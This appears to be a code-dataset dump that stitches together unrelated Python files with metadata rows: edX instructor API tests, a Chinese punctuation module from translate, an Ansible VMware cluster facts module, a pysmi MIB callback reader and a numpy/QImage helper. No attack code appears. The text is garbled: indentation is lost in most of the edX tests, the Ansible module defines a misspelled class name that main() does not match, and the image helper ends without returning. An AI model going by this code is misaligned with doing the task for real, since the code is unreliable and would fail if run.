email_info = FakeEmailInfo(email, 0, 10)
task_history_request.return_value = [task_info]
url = reverse('list_email_content', kwargs={'course_id': str(self.course.id)})
with patch('lms.djangoapps.instructor.views.api.CourseEmail.objects.get') as mock_email_info:
mock_email_info.return_value = email
response = self.client.post(url, {})
assert response.status_code == 200
assert task_history_request.called
returned_info_list = json.loads(response.content.decode('utf-8'))['emails']
assert len(returned_info_list) == 1
returned_info = returned_info_list[0]
expected_info = email_info.to_dict()
self.assertDictEqual(expected_info, returned_info)
class TestInstructorAPIHelpers(TestCase):
""" Test helpers for instructor.api """
def test_split_input_list(self):
strings = []
lists = []
strings.append(
"Lorem@ipsum.dolor, sit@amet.consectetur\nadipiscing@elit.Aenean\r convallis@at.lacus\r, ut@lacinia.Sed")
lists.append(['Lorem@ipsum.dolor', 'sit@amet.consectetur', 'adipiscing@elit.Aenean', 'convallis@at.lacus',
'ut@lacinia.Sed'])
for (stng, lst) in zip(strings, lists):
assert _split_input_list(stng) == lst
def test_split_input_list_unicode(self):
        assert _split_input_list('robot@robot.edu, robot2@robot.edu') == ['robot@robot.edu', 'robot2@robot.edu']
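        # Non-ASCII input should pass through _split_input_list unchanged.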
scary_unistuff = chr(40960) + 'abcd' + chr(1972)
assert _split_input_list(scary_unistuff) == [scary_unistuff]
def test_msk_from_problem_urlname(self):
course_id = CourseKey.from_string('MITx/6.002x/2013_Spring')
name = 'L2Node1'
output = 'i4x://MITx/6.002x/problem/L2Node1'
assert str(msk_from_problem_urlname(course_id, name)) == output
def test_msk_from_problem_urlname_error(self):
args = ('notagoodcourse', 'L2Node1')
with pytest.raises(ValueError):
msk_from_problem_urlname(*args)
def get_extended_due(course, unit, user):
"""
Gets the overridden due date for the given user on the given unit. Returns
`None` if there is no override set.
"""
location = str(unit.location)
dates = get_overrides_for_user(course.id, user)
for override in dates:
if str(override['location']) == location:
return override['actual_date']
return None
def get_date_for_block(course, unit, user):
"""
Gets the due date for the given user on the given unit (overridden or original).
Returns `None` if there is no date set.
    (Differs from edx-when's get_date_for_block only in that we skip the cache.)
"""
return get_dates_for_course(course.id, user=user, use_cached=False).get((unit.location, 'due'), None)
class TestDueDateExtensions(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
    Tests for granting and resetting due date extensions.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
cls.due = datetime.datetime(2010, 5, 12, 2, 42, tzinfo=UTC)
with cls.store.bulk_operations(cls.course.id, emit_signals=False):
cls.week1 = ItemFactory.create(due=cls.due)
cls.week2 = ItemFactory.create(due=cls.due)
cls.week3 = ItemFactory.create() # No due date
cls.course.children = [
str(cls.week1.location),
str(cls.week2.location),
str(cls.week3.location)
]
cls.homework = ItemFactory.create(
parent_location=cls.week1.location,
due=cls.due
)
cls.week1.children = [str(cls.homework.location)]
def setUp(self):
"""
Fixtures.
"""
super().setUp()
user1 = UserFactory.create()
StudentModule(
state='{}',
student_id=user1.id,
course_id=self.course.id,
module_state_key=self.week1.location).save()
StudentModule(
state='{}',
student_id=user1.id,
course_id=self.course.id,
module_state_key=self.week2.location).save()
StudentModule(
state='{}',
student_id=user1.id,
course_id=self.course.id,
module_state_key=self.week3.location).save()
StudentModule(
state='{}',
student_id=user1.id,
course_id=self.course.id,
module_state_key=self.homework.location).save()
user2 = UserFactory.create()
StudentModule(
state='{}',
student_id=user2.id,
course_id=self.course.id,
module_state_key=self.week1.location).save()
StudentModule(
state='{}',
student_id=user2.id,
course_id=self.course.id,
module_state_key=self.homework.location).save()
user3 = UserFactory.create()
StudentModule(
state='{}',
student_id=user3.id,
course_id=self.course.id,
module_state_key=self.week1.location).save()
StudentModule(
state='{}',
student_id=user3.id,
course_id=self.course.id,
module_state_key=self.homework.location).save()
self.user1 = user1
self.user2 = user2
CourseEnrollmentFactory.create(user=self.user1, course_id=self.course.id)
CourseEnrollmentFactory.create(user=self.user2, course_id=self.course.id)
self.instructor = InstructorFactory(course_key=self.course.id)
self.client.login(username=self.instructor.username, password='test')
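        # Extract the course's dates into the scheduling store so the
        # due-date override endpoints below have a baseline to work against.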
extract_dates(None, self.course.id)
def test_change_due_date(self):
url = reverse('change_due_date', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'student': self.user1.username,
'url': str(self.week1.location),
'due_datetime': '12/30/2013 00:00'
})
assert response.status_code == 200, response.content
assert datetime.datetime(2013, 12, 30, 0, 0, tzinfo=UTC) ==\
get_extended_due(self.course, self.week1, self.user1)
def test_change_to_invalid_due_date(self):
url = reverse('change_due_date', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'student': self.user1.username,
'url': str(self.week1.location),
'due_datetime': '01/01/2009 00:00'
})
assert response.status_code == 400, response.content
assert get_extended_due(self.course, self.week1, self.user1) is None
def test_change_nonexistent_due_date(self):
url = reverse('change_due_date', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'student': self.user1.username,
'url': str(self.week3.location),
'due_datetime': '12/30/2013 00:00'
})
assert response.status_code == 400, response.content
assert get_extended_due(self.course, self.week3, self.user1) is None
@override_experiment_waffle_flag(RELATIVE_DATES_FLAG, active=True)
def test_reset_date(self):
self.test_change_due_date()
url = reverse('reset_due_date', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'student': self.user1.username,
'url': str(self.week1.location),
})
assert response.status_code == 200, response.content
assert self.due == get_extended_due(self.course, self.week1, self.user1)
@override_experiment_waffle_flag(RELATIVE_DATES_FLAG, active=True)
def test_reset_date_only_in_edx_when(self):
# Start with a unit that only has a date in edx-when
assert get_date_for_block(self.course, self.week3, self.user1) is None
original_due = datetime.datetime(2010, 4, 1, tzinfo=UTC)
set_date_for_block(self.course.id, self.week3.location, 'due', original_due)
assert get_date_for_block(self.course, self.week3, self.user1) == original_due
# set override, confirm it took
override = datetime.datetime(2010, 7, 1, tzinfo=UTC)
set_date_for_block(self.course.id, self.week3.location, 'due', override, user=self.user1)
assert get_date_for_block(self.course, self.week3, self.user1) == override
# Now test that we noticed the edx-when date
url = reverse('reset_due_date', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'student': self.user1.username,
'url': str(self.week3.location),
})
self.assertContains(response, 'Successfully reset due date for student')
assert get_date_for_block(self.course, self.week3, self.user1) == original_due
def test_show_unit_extensions(self):
self.test_change_due_date()
url = reverse('show_unit_extensions',
kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'url': str(self.week1.location)})
assert response.status_code == 200, response.content
        assert json.loads(response.content.decode('utf-8')) ==\
            {'data': [{'Extended Due Date': '2013-12-30 00:00',
                       'Full Name': self.user1.profile.name, 'Username': self.user1.username}],
             'header': ['Username', 'Full Name', 'Extended Due Date'],
             'title': ('Users with due date extensions for %s' % self.week1.display_name)}
def test_show_student_extensions(self):
self.test_change_due_date()
url = reverse('show_student_extensions',
kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'student': self.user1.username})
assert response.status_code == 200, response.content
assert json.loads(response.content.decode('utf-8')) ==\
{'data': [{'Extended Due Date': '2013-12-30 00:00', 'Unit': self.week1.display_name}],
'header': ['Unit', 'Extended Due Date'],
'title': ('Due date extensions for %s (%s)' % (self.user1.profile.name, self.user1.username))}
class TestDueDateExtensionsDeletedDate(ModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Tests for deleting due date extensions
"""
def setUp(self):
"""
Fixtures.
"""
super().setUp()
self.course = CourseFactory.create()
self.due = datetime.datetime(2010, 5, 12, 2, 42, tzinfo=UTC)
with self.store.bulk_operations(self.course.id, emit_signals=False):
self.week1 = ItemFactory.create(due=self.due)
self.week2 = ItemFactory.create(due=self.due)
self.week3 = ItemFactory.create() # No due date
self.course.children = [
str(self.week1.location),
str(self.week2.location),
str(self.week3.location)
]
self.homework = ItemFactory.create(
parent_location=self.week1.location,
due=self.due
)
self.week1.children = [str(self.homework.location)]
user1 = UserFactory.create()
StudentModule(
state='{}',
student_id=user1.id,
course_id=self.course.id,
module_state_key=self.week1.location).save()
StudentModule(
state='{}',
student_id=user1.id,
course_id=self.course.id,
module_state_key=self.week2.location).save()
StudentModule(
state='{}',
student_id=user1.id,
course_id=self.course.id,
module_state_key=self.week3.location).save()
StudentModule(
state='{}',
student_id=user1.id,
course_id=self.course.id,
module_state_key=self.homework.location).save()
user2 = UserFactory.create()
StudentModule(
state='{}',
student_id=user2.id,
course_id=self.course.id,
module_state_key=self.week1.location).save()
StudentModule(
state='{}',
student_id=user2.id,
course_id=self.course.id,
module_state_key=self.homework.location).save()
user3 = UserFactory.create()
StudentModule(
state='{}',
student_id=user3.id,
course_id=self.course.id,
module_state_key=self.week1.location).save()
StudentModule(
state='{}',
student_id=user3.id,
course_id=self.course.id,
module_state_key=self.homework.location).save()
self.user1 = user1
self.user2 = user2
CourseEnrollmentFactory.create(user=self.user1, course_id=self.course.id)
CourseEnrollmentFactory.create(user=self.user2, course_id=self.course.id)
self.instructor = InstructorFactory(course_key=self.course.id)
self.client.login(username=self.instructor.username, password='test')
extract_dates(None, self.course.id)
@override_experiment_waffle_flag(RELATIVE_DATES_FLAG, active=True)
def test_reset_extension_to_deleted_date(self):
"""
        Test that we can reset a due date extension after the original due
        date has been removed, without causing an error.
"""
url = reverse('change_due_date', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'student': self.user1.username,
'url': str(self.week1.location),
'due_datetime': '12/30/2013 00:00'
})
assert response.status_code == 200, response.content
assert datetime.datetime(2013, 12, 30, 0, 0, tzinfo=UTC) ==\
get_extended_due(self.course, self.week1, self.user1)
self.week1.due = None
self.week1 = self.store.update_item(self.week1, self.user1.id)
extract_dates(None, self.course.id)
# Now, week1's normal due date is deleted but the extension still exists.
url = reverse('reset_due_date', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'student': self.user1.username,
'url': str(self.week1.location),
})
assert response.status_code == 200, response.content
assert self.due == get_extended_due(self.course, self.week1, self.user1)
class TestCourseIssuedCertificatesData(SharedModuleStoreTestCase):
"""
Test data dumps for issued certificates.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
def setUp(self):
super().setUp()
self.instructor = InstructorFactory(course_key=self.course.id)
self.client.login(username=self.instructor.username, password='test')
def generate_certificate(self, course_id, mode, status):
"""
Generate test certificate
"""
test_user = UserFactory()
GeneratedCertificateFactory.create(
user=test_user,
course_id=course_id,
mode=mode,
status=status
)
def test_certificates_features_against_status(self):
"""
        Test that certificates with status 'downloadable' are included in the response.
"""
url = reverse('get_issued_certificates', kwargs={'course_id': str(self.course.id)})
        # First, generate certificates in 'honor' mode with status 'generating';
        # they should not appear in the response.
certificate_count = 3
for __ in range(certificate_count):
self.generate_certificate(course_id=self.course.id, mode='honor', status=CertificateStatuses.generating)
response = self.client.post(url)
res_json = json.loads(response.content.decode('utf-8'))
assert 'certificates' in res_json
assert len(res_json['certificates']) == 0
# Certificates with status 'downloadable' should be in response.
self.generate_certificate(course_id=self.course.id, mode='honor', status=CertificateStatuses.downloadable)
response = self.client.post(url)
res_json = json.loads(response.content.decode('utf-8'))
assert 'certificates' in res_json
assert len(res_json['certificates']) == 1
def test_certificates_features_group_by_mode(self):
"""
        Test for certificate csv features against mode. Certificates should be grouped by 'mode' in the response.
"""
url = reverse('get_issued_certificates', kwargs={'course_id': str(self.course.id)})
        # first, generate downloadable certificates in 'honor' mode
certificate_count = 3
for __ in range(certificate_count):
self.generate_certificate(course_id=self.course.id, mode='honor', status=CertificateStatuses.downloadable)
response = self.client.post(url)
res_json = json.loads(response.content.decode('utf-8'))
assert 'certificates' in res_json
assert len(res_json['certificates']) == 1
        # retrieve the first certificate group from the list; it reports 3 certificates for 'honor' mode.
certificate = res_json['certificates'][0]
assert certificate.get('total_issued_certificate') == 3
assert certificate.get('mode') == 'honor'
assert certificate.get('course_id') == str(self.course.id)
# Now generating downloadable certificates with 'verified' mode
for __ in range(certificate_count):
self.generate_certificate(
course_id=self.course.id,
mode='verified',
status=CertificateStatuses.downloadable
)
response = self.client.post(url)
res_json = json.loads(response.content.decode('utf-8'))
assert 'certificates' in res_json
        # there should now be two certificate groups: 'honor' and 'verified'.
        assert len(res_json['certificates']) == 2
        # retrieve the second certificate group from the list
        certificate = res_json['certificates'][1]
assert certificate.get('total_issued_certificate') == 3
assert certificate.get('mode') == 'verified'
def test_certificates_features_csv(self):
"""
Test for certificate csv features.
"""
url = reverse('get_issued_certificates', kwargs={'course_id': str(self.course.id)})
        # first, generate downloadable certificates in 'honor' mode
certificate_count = 3
for __ in range(certificate_count):
self.generate_certificate(course_id=self.course.id, mode='honor', status=CertificateStatuses.downloadable)
current_date = datetime.date.today().strftime("%B %d, %Y")
response = self.client.get(url, {'csv': 'true'})
assert response['Content-Type'] == 'text/csv'
        assert response['Content-Disposition'] == 'attachment; filename=issued_certificates.csv'
        expected_content = (
            '"CourseID","Certificate Type","Total Certificates Issued","Date Report Run"\r\n'
            '"{}","honor","3","{}"'
        ).format(self.course.id, current_date)
        assert response.content.strip().decode('utf-8') == expected_content
class TestBulkCohorting(SharedModuleStoreTestCase):
"""
Test adding users to cohorts in bulk via CSV upload.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
def setUp(self):
super().setUp()
self.staff_user = StaffFactory(course_key=self.course.id)
self.non_staff_user = UserFactory.create()
self.tempdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, self.tempdir)
def call_add_users_to_cohorts(self, csv_data, suffix='.csv'):
"""
Call `add_users_to_cohorts` with a file generated from `csv_data`.
"""
        # this temporary file lives in self.tempdir, which is removed by the
        # addCleanup registered in setUp
__, file_name = tempfile.mkstemp(suffix=suffix, dir=self.tempdir)
with open(file_name, 'w') as file_pointer:
file_pointer.write(csv_data)
with open(file_name) as file_pointer:
url = reverse('add_users_to_cohorts', kwargs={'course_id': str(self.course.id)})
return self.client.post(url, {'uploaded-file': file_pointer})
def expect_error_on_file_content(self, file_content, error, file_suffix='.csv'):
"""
Verify that we get the error we expect for a given file input.
"""
self.client.login(username=self.staff_user.username, password='test')
response = self.call_add_users_to_cohorts(file_content, suffix=file_suffix)
assert response.status_code == 400
result = json.loads(response.content.decode('utf-8'))
assert result['error'] == error
def verify_success_on_file_content(self, file_content, mock_store_upload, mock_cohort_task):
"""
        Verify that `add_users_to_cohorts` successfully validates the
file content, uploads the input file, and triggers the
background task.
"""
mock_store_upload.return_value = (None, 'fake_file_name.csv')
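        # The mocked upload returns a fake filename so the cohorting task can
        # be submitted without touching real storage.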
self.client.login(username=self.staff_user.username, password='test')
response = self.call_add_users_to_cohorts(file_content)
assert response.status_code == 204
assert mock_store_upload.called
assert mock_cohort_task.called
def test_no_cohort_field(self):
"""
Verify that we get a descriptive verification error when we haven't
included a cohort field in the uploaded CSV.
"""
self.expect_error_on_file_content(
'username,email\n', "The file must contain a 'cohort' column containing cohort names."
)
def test_no_username_or_email_field(self):
"""
Verify that we get a descriptive verification error when we haven't
included a username or email field in the uploaded CSV.
"""
self.expect_error_on_file_content(
'cohort\n', "The file must contain a 'username' column, an 'email' column, or both."
)
def test_empty_csv(self):
"""
Verify that we get a descriptive verification error when we haven't
included any data in the uploaded CSV.
"""
self.expect_error_on_file_content(
'', "The file must contain a 'cohort' column containing cohort names."
)
def test_wrong_extension(self):
"""
Verify that we get a descriptive verification error when we haven't
uploaded a file with a '.csv' extension.
"""
self.expect_error_on_file_content(
'', "The file must end with the extension '.csv'.", file_suffix='.notcsv'
)
def test_non_staff_no_access(self):
"""
Verify that we can't access the view when we aren't a staff user.
"""
self.client.login(username=self.non_staff_user.username, password='test')
response = self.call_add_users_to_cohorts('')
assert response.status_code == 403
@patch('lms.djangoapps.instructor_task.api.submit_cohort_students')
@patch('lms.djangoapps.instructor.views.api.store_uploaded_file')
def test_success_username(self, mock_store_upload, mock_cohort_task):
"""
Verify that we store the input CSV and call a background task when
the CSV has username and cohort columns.
"""
self.verify_success_on_file_content(
'username,cohort\nfoo_username,bar_cohort', mock_store_upload, mock_cohort_task
)
@patch('lms.djangoapps.instructor_task.api.submit_cohort_students')
@patch('lms.djangoapps.instructor.views.api.store_uploaded_file')
def test_success_email(self, mock_store_upload, mock_cohort_task):
"""
Verify that we store the input CSV and call the cohorting background
task when the CSV has email and cohort columns.
"""
self.verify_success_on_file_content(
'email,cohort\nfoo_email,bar_cohort', mock_store_upload, mock_cohort_task
)
@patch('lms.djangoapps.instructor_task.api.submit_cohort_students')
@patch('lms.djangoapps.instructor.views.api.store_uploaded_file')
def test_success_username_and_email(self, mock_store_upload, mock_cohort_task):
"""
Verify that we store the input CSV and call the cohorting background
task when the CSV has username, email and cohort columns.
"""
self.verify_success_on_file_content(
'username,email,cohort\nfoo_username,bar_email,baz_cohort', mock_store_upload, mock_cohort_task
)
@patch('lms.djangoapps.instructor_task.api.submit_cohort_students')
@patch('lms.djangoapps.instructor.views.api.store_uploaded_file')
def test_success_carriage_return(self, mock_store_upload, mock_cohort_task):
"""
Verify that we store the input CSV and call the cohorting background
task when lines in the CSV are delimited by carriage returns.
"""
self.verify_success_on_file_content(
'username,email,cohort\rfoo_username,bar_email,baz_cohort', mock_store_upload, mock_cohort_task
)
@patch('lms.djangoapps.instructor_task.api.submit_cohort_students')
@patch('lms.djangoapps.instructor.views.api.store_uploaded_file')
def test_success_carriage_return_line_feed(self, mock_store_upload, mock_cohort_task):
"""
Verify that we store the input CSV and call the cohorting background
task when lines in the CSV are delimited by carriage returns and line
feeds.
"""
self.verify_success_on_file_content(
'username,email,cohort\r\nfoo_username,bar_email,baz_cohort', mock_store_upload, mock_cohort_task
)
class TestInstructorCertificateExceptions(SharedModuleStoreTestCase):
"""
Tests for utility functions utilized in the Instructor Dashboard Certificates app.
"""
def setUp(self):
super().setUp()
self.global_staff = GlobalStaffFactory()
self.course = CourseFactory.create()
self.user = UserFactory()
CourseEnrollment.enroll(self.user, self.course.id)
def test_get_student_from_request_data(self):
"""
        Test ability to retrieve a learner record using their username.
"""
student = _get_student_from_request_data({"user": self.user.username})
assert student.username == self.user.username
def test_get_student_from_request_data_empty_username(self):
"""
Test that we receive an expected error when no learner's username or email is entered
"""
with pytest.raises(ValueError) as error:
_get_student_from_request_data({"user": ""})
assert str(error.value) == (
'Student username/email field is required and can not be empty. Kindly fill in username/email and then '
'press "Invalidate Certificate" button.'
)
def test_get_student_from_request_data_user_dne(self):
"""
Test to verify an expected error message is returned when attempting to retrieve a learner that does not exist
in the LMS.
"""
with pytest.raises(ValueError) as error:
_get_student_from_request_data({"user": "Neo"})
assert str(error.value) == "Neo does not exist in the LMS. Please check your spelling and retry."
def test_get_certificate_for_user(self):
"""
Test that attempts to retrieve a Certificate for a learner in a course-run.
"""
generated_certificate = GeneratedCertificateFactory.create(
user=self.user,
course_id=self.course.id,
mode='verified',
status=CertificateStatuses.downloadable,
)
retrieved_certificate = _get_certificate_for_user(self.course.id, self.user)
assert retrieved_certificate.id == generated_certificate.id
def test_get_certificate_for_user_no_certificate(self):
"""
Test to verify an expected error message is returned when attempting to retrieve a certificate for a learner
that does not exist yet.
"""
with pytest.raises(ValueError) as error:
_get_certificate_for_user(self.course.id, self.user)
assert str(error.value) == (
f"The student {self.user} does not have certificate for the course {self.course.id.course}. Kindly "
"verify student username/email and the selected course are correct and try again."
)
| agpl-3.0 | -7,379,486,599,918,372,000 | 41.9 | 202 | 0.613406 | false | 4.06535 | true | false | false |
dwaynebailey/translate | translate/lang/zh.py | 3 | 2423 | # -*- coding: utf-8 -*-
#
# Copyright 2007 Zuza Software Foundation
#
# This file is part of translate.
#
# translate is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# translate is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
"""This module represents the Chinese language (Both tradisional and simplified).
.. seealso:: http://en.wikipedia.org/wiki/Chinese_language
"""
from __future__ import unicode_literals
import re
from translate.lang import common
class zh(common.Common):
"""This class represents Chinese."""
listseperator = "、"
sentenceend = "。!?!?…"
# Compared to common.py, we make the space after the sentence ending
# optional and don't demand an uppercase letter to follow.
sentencere = re.compile(r"""(?s) # make . also match newlines
.*? # any text, but match non-greedy
[%s] # the puntuation for sentence ending
\s* # the optional space after the puntuation
""" % sentenceend, re.VERBOSE)
# The following transformation rules should be mostly useful for all types
# of Chinese. The comma (,) is not handled here, since it maps to two
# different characters, depending on context.
# If comma is used as seperation of sentence, it should be converted to a
# fullwidth comma (","). If comma is used as seperation of list items
# like "apple, orange, grape, .....", "、" is used.
puncdict = {
". ": "。",
"; ": ";",
": ": ":",
"! ": "!",
"? ": "?",
".\n": "。\n",
";\n": ";\n",
":\n": ":\n",
"!\n": "!\n",
"?\n": "?",
"% ": "%",
}
@classmethod
def length_difference(cls, length):
return 10 - length / 2
ignoretests = {
'all': ["simplecaps", "startcaps"],
}
| gpl-2.0 | -8,731,170,228,729,389,000 | 31.726027 | 81 | 0.601088 | false | 3.871961 | false | false | false |
etingof/pysmi | pysmi/reader/callback.py | 1 | 1516 | #
# This file is part of pysmi software.
#
# Copyright (c) 2015-2020, Ilya Etingof <etingof@gmail.com>
# License: http://snmplabs.com/pysmi/license.html
#
import time
from pysmi.reader.base import AbstractReader
from pysmi.mibinfo import MibInfo
from pysmi import error
from pysmi import debug
class CallbackReader(AbstractReader):
"""Fetch ASN.1 MIB text by name by calling user-defined callable.
*CallbackReader* class instance tries to retrieve ASN.1 MIB files
by name and return their contents to caller.
"""
def __init__(self, cbFun, cbCtx=None):
"""Create an instance of *CallbackReader* bound to specific URL.
Args:
cbFun (callable): user callable accepting *MIB name* and *cbCtx* objects
Keyword Args:
cbCtx (object): user object that can be used to communicate state information
between user-scope code and the *cbFun* callable scope
"""
self._cbFun = cbFun
self._cbCtx = cbCtx
def __str__(self):
return '%s{"%s"}' % (self.__class__.__name__, self._cbFun)
def getData(self, mibname, **options):
debug.logger & debug.flagReader and debug.logger('calling user callback %s for MIB %s' % (self._cbFun, mibname))
res = self._cbFun(mibname, self._cbCtx)
if res:
return MibInfo(path='file:///dev/stdin', file='', name=mibname, mtime=time.time()), res
raise error.PySmiReaderFileNotFoundError(mibname=mibname, reader=self)
| bsd-2-clause | 4,648,905,572,071,834,000 | 34.255814 | 120 | 0.652375 | false | 3.661836 | false | false | false |
sorenk/ansible | lib/ansible/modules/cloud/vmware/vmware_cluster_facts.py | 7 | 8021 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2018, Ansible Project
# Copyright: (c) 2018, Abhijeet Kasurde <akasurde@redhat.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: vmware_cluster_facts
short_description: Gather facts about clusters available in given vCenter
description:
- This module can be used to gather facts about clusters in VMWare infrastructure.
- All values and VMware object names are case sensitive.
version_added: '2.6'
author:
- Abhijeet Kasurde (@akasurde)
notes:
- Tested on vSphere 6.5
requirements:
- "python >= 2.6"
- PyVmomi
options:
datacenter:
description:
- Datacenter to search for cluster/s.
- This parameter is required, if C(cluster_name) is not supplied.
required: False
cluster_name:
description:
- Name of the cluster.
- If set, facts of this cluster will be returned.
- This parameter is required, if C(datacenter) is not supplied.
required: False
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = '''
- name: Gather cluster facts from given datacenter
vmware_cluster_facts:
hostname: 192.168.1.209
username: administrator@vsphere.local
password: vmware
datacenter: ha-datacenter
validate_certs: False
delegate_to: localhost
register: cluster_facts
- name: Gather facts from datacenter about specific cluster
vmware_cluster_facts:
hostname: 192.168.1.209
username: administrator@vsphere.local
password: vmware
cluster_name: DC0_C0
validate_certs: False
delegate_to: localhost
register: cluster_facts
'''
RETURN = """
clusters:
description: metadata about the available clusters
returned: always
type: dict
sample: {
"DC0_C0": {
"drs_default_vm_behavior": null,
"drs_enable_vm_behavior_overrides": null,
"drs_vmotion_rate": null,
"enable_ha": null,
"enabled_drs": true,
"enabled_vsan": false,
"ha_admission_control_enabled": null,
"ha_failover_level": null,
"ha_host_monitoring": null,
"ha_restart_priority": null,
"ha_vm_failure_interval": null,
"ha_vm_max_failure_window": null,
"ha_vm_max_failures": null,
"ha_vm_min_up_time": null,
"ha_vm_monitoring": null,
"ha_vm_tools_monitoring": null,
"vsan_auto_claim_storage": false
},
}
"""
try:
from pyVmomi import vim
except ImportError:
pass
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vmware import PyVmomi, vmware_argument_spec, find_datacenter_by_name, find_cluster_by_name
class VmwreClusterFactsManager(PyVmomi):
def __init__(self, module):
super(VmwreClusterFactsManager, self).__init__(module)
datacenter = self.params.get('datacenter')
cluster_name = self.params.get('cluster_name')
self.cluster_objs = []
if datacenter:
datacenter_obj = find_datacenter_by_name(self.content, datacenter_name=datacenter)
if datacenter_obj is None:
self.module.fail_json(msg="Failed to find datacenter '%s'" % datacenter)
self.cluster_objs = self.get_all_cluster_objs(parent=datacenter_obj)
elif cluster_name:
cluster_obj = find_cluster_by_name(self.content, cluster_name=cluster_name)
if cluster_obj is None:
self.module.fail_json(msg="Failed to find cluster '%s'" % cluster_name)
self.cluster_objs = [cluster_obj]
def get_all_cluster_objs(self, parent):
"""
Function to get all cluster managed objects from given parent object
Args:
parent: Managed objected of datacenter or host folder
Returns: List of host managed objects
"""
cluster_objs = []
if isinstance(parent, vim.Datacenter):
folder = parent.hostFolder
else:
folder = parent
for child in folder.childEntity:
if isinstance(child, vim.Folder):
cluster_objs = cluster_objs + self.get_all_cluster_objs(child)
if isinstance(child, vim.ClusterComputeResource):
cluster_objs.append(child)
return cluster_objs
def gather_cluster_facts(self):
"""
Function to gather facts about cluster
"""
results = dict(changed=False, clusters=dict())
for cluster in self.cluster_objs:
# Default values
ha_failover_level = None
ha_restart_priority = None
ha_vm_tools_monitoring = None
ha_vm_min_up_time = None
ha_vm_max_failures = None
ha_vm_max_failure_window = None
ha_vm_failure_interval = None
enabled_vsan = False
vsan_auto_claim_storage = False
# HA
das_config = cluster.configurationEx.dasConfig
if das_config.admissionControlPolicy:
ha_failover_level = das_config.admissionControlPolicy.failoverLevel
if das_config.defaultVmSettings:
                ha_restart_priority = das_config.defaultVmSettings.restartPriority
                ha_vm_tools_monitoring = das_config.defaultVmSettings.vmToolsMonitoringSettings.vmMonitoring
                ha_vm_min_up_time = das_config.defaultVmSettings.vmToolsMonitoringSettings.minUpTime
                ha_vm_max_failures = das_config.defaultVmSettings.vmToolsMonitoringSettings.maxFailures
                ha_vm_max_failure_window = das_config.defaultVmSettings.vmToolsMonitoringSettings.maxFailureWindow
                ha_vm_failure_interval = das_config.defaultVmSettings.vmToolsMonitoringSettings.failureInterval
# DRS
drs_config = cluster.configurationEx.drsConfig
# VSAN
if hasattr(cluster.configurationEx, 'vsanConfig'):
vsan_config = cluster.configurationEx.vsanConfig
                enabled_vsan = vsan_config.enabled
                vsan_auto_claim_storage = vsan_config.defaultConfig.autoClaimStorage
results['clusters'][cluster.name] = dict(
enable_ha=das_config.enabled,
ha_failover_level=ha_failover_level,
ha_vm_monitoring=das_config.vmMonitoring,
ha_host_monitoring=das_config.hostMonitoring,
ha_admission_control_enabled=das_config.admissionControlEnabled,
ha_restart_priority=ha_restart_priority,
ha_vm_tools_monitoring=ha_vm_tools_monitoring,
ha_vm_min_up_time=ha_vm_min_up_time,
ha_vm_max_failures=ha_vm_max_failures,
ha_vm_max_failure_window=ha_vm_max_failure_window,
ha_vm_failure_interval=ha_vm_failure_interval,
enabled_drs=drs_config.enabled,
drs_enable_vm_behavior_overrides=drs_config.enableVmBehaviorOverrides,
drs_default_vm_behavior=drs_config.defaultVmBehavior,
drs_vmotion_rate=drs_config.vmotionRate,
enabled_vsan=enabled_vsan,
vsan_auto_claim_storage=vsan_auto_claim_storage,
)
self.module.exit_json(**results)
def main():
argument_spec = vmware_argument_spec()
argument_spec.update(
datacenter=dict(type='str'),
cluster_name=dict(type='str')
)
module = AnsibleModule(
argument_spec=argument_spec,
required_one_of=[
['cluster_name', 'datacenter'],
],
)
    pyv = VmwareClusterFactsManager(module)
pyv.gather_cluster_facts()
if __name__ == '__main__':
main()
| gpl-3.0 | 5,528,659,484,127,036,000 | 34.648889 | 116 | 0.626855 | false | 3.903163 | true | false | false |
fredo-editor/FreDo | fredo/util/numpy_util.py | 1 | 2992 | from PySide.QtGui import QImage
import numpy as np
def qimage_to_numpy(qimage):
""" Returns an RGB array given any image. """
    # Each bitmap row is stored padded to a multiple of 4 bytes; shorter
    # rows are zero-padded. A 32-bit format makes every pixel 4 bytes,
    # so no padding handling is needed.
qimage = qimage.convertToFormat(QImage.Format_ARGB32)
w, h = qimage.width(), qimage.height()
string = qimage.bits()
arr = np.fromstring(bytes(string), dtype=np.uint8)
arr = arr.reshape(h, w, 4)
arr = arr[..., 0:3]
c0 = arr[..., 0].copy()
c2 = arr[..., 2].copy()
arr[..., 0] = c2
arr[..., 2] = c0
return arr
def numpy_to_qimage(array):
""" Returns QImage from an RGB array ."""
rows, cols, channels = array.shape
array4 = np.zeros((rows, cols, 4), dtype=np.uint8)
array4[..., 0:3] = array
array4[..., 3] = 255
c0 = array[..., 0].copy()
c2 = array[..., 2].copy()
array4[..., 0] = c2
array4[..., 2] = c0
string = array4.tostring()
img = QImage(string, cols, rows, QImage.Format_ARGB32)
